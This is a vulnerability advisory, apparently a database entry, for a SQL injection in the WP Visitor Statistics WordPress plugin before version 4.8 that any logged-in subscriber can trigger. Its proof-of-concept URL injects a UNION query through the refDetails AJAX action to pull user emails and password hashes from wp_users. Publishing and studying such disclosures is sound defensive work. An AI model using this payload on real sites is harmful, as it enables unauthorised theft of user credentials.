WordPress Plugin Vulnerabilities
WP Visitor Statistics (Real Time Traffic) < 4.8 - Subscriber+ SQL Injection
Description
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22%27%20union%20select%201,1,user_email,user_pass%20from%20wp_users%20--%20g%22%7D
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-22 (about 2 years ago)
Added
2021-11-22 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)